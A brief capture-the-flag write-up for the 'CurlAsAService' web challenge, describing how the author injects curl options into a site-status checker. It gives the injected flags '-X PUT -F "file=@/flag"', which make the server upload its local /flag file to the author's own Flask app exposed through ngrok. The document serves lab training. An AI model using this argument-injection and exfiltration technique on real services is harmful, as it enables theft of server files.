CurlAsAService
CHALLENGE DESCRIPTION
cURL As A Service or CAAS is a brand new Alien application, built so that humans can test the status of their websites. However, it seems that the Aliens have not quite got the hang of Human programming and the application is riddled with issues.
I approached a black box testing on the challenge
Website
A simple curl request that will get the frontend src code
There are many ways to solve this challenge
I will make a flask app that handles put request and tell curl to put the file on my app
Flask app
After this start ngrok on port 5000
run the app.py file
Payload
breakdown:
-X PUT : this will tell curl what http method to use
-F "file=@/flag" : This will tell curl what file to upload (-F is basically to mention we are using file)
Turn on burspsuite and url encode the above payload
pwned
Last updated